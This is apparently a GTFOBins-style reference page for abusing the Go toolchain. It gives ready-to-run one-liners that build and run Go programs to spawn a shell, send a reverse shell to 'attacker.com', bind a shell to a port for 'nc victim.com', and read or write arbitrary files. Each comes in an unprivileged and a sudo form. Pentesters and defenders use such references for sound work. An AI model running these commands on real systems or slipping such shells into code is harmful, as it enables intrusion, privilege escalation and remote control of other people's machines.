.. / go

Sponsor

Fork

Star

Sponsor

Fork

Star

• Shell
• Reverse shell
• Bind shell
• File write
• File read

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e 'package main\nimport "syscall"\nfunc main(){\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, []string{})\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e 'package main\nimport "syscall"\nfunc main(){\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, []string{})\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e 'package main\nimport (\n\t"os"\n\t"net"\n\t"syscall"\n)\n\nfunc main(){\n\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n\tip := net.ParseIP("attacker.com").To4()\n\taddr := &syscall.SockaddrInet4{Port: 12345}\n\tcopy(addr.Addr[:], ip)\n\tsyscall.Connect(fd, addr)\n\tsyscall.Dup2(fd, 0)\n\tsyscall.Dup2(fd, 1)\n\tsyscall.Dup2(fd, 2)\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, os.Environ())\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e 'package main\nimport (\n\t"os"\n\t"net"\n\t"syscall"\n)\n\nfunc main(){\n\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n\tip := net.ParseIP("attacker.com").To4()\n\taddr := &syscall.SockaddrInet4{Port: 12345}\n\tcopy(addr.Addr[:], ip)\n\tsyscall.Connect(fd, addr)\n\tsyscall.Dup2(fd, 0)\n\tsyscall.Dup2(fd, 1)\n\tsyscall.Dup2(fd, 2)\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, os.Environ())\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  nc -l -p 12345

Bind shell

This executable can bind a system shell to a local port waiting for an attacker to connect.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e 'package main\nimport (\n\t"os"\n\t"syscall"\n)\n\nfunc main(){\n\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n\taddr := &syscall.SockaddrInet4{Port: 12345}\n\tcopy(addr.Addr[:], []byte{0,0,0,0})\n\tsyscall.Bind(fd, addr)\n\tsyscall.Listen(fd, 1)\n\tnfd, _, _ := syscall.Accept(fd)\n\tsyscall.Dup2(nfd, 0)\n\tsyscall.Dup2(nfd, 1)\n\tsyscall.Dup2(nfd, 2)\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, os.Environ())\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e 'package main\nimport (\n\t"os"\n\t"syscall"\n)\n\nfunc main(){\n\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n\taddr := &syscall.SockaddrInet4{Port: 12345}\n\tcopy(addr.Addr[:], []byte{0,0,0,0})\n\tsyscall.Bind(fd, addr)\n\tsyscall.Listen(fd, 1)\n\tnfd, _, _ := syscall.Accept(fd)\n\tsyscall.Dup2(nfd, 0)\n\tsyscall.Dup2(nfd, 1)\n\tsyscall.Dup2(nfd, 2)\n\tsyscall.Exec("/bin/sh", []string{"/bin/sh", "-i"}, os.Environ())\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Connector

  A TCP client can be used on the attacker box to connect to the shell.

  nc victim.com 12345

File write

This executable can write data to local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e 'package main\nimport "os"\nfunc main(){\n\tf, _ := os.OpenFile("/path/to/output-file", os.O_RDWR|os.O_CREATE, 0644)\n\tf.Write([]byte("DATA\\n"))\n\tf.Close()\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e 'package main\nimport "os"\nfunc main(){\n\tf, _ := os.OpenFile("/path/to/output-file", os.O_RDWR|os.O_CREATE, 0644)\n\tf.Write([]byte("DATA\\n"))\n\tf.Close()\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo -e 'package main\nimport (\n\t"fmt"\n\t"os"\n)\n\nfunc main(){\n\tb, _ := os.ReadFile("/path/to/input-file")\n\tfmt.Print(string(b))\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo -e 'package main\nimport (\n\t"fmt"\n\t"os"\n)\n\nfunc main(){\n\tb, _ := os.ReadFile("/path/to/input-file")\n\tfmt.Print(string(b))\n}' >/path/to/temp-file.go
  go run /path/to/temp-file.go

Source | History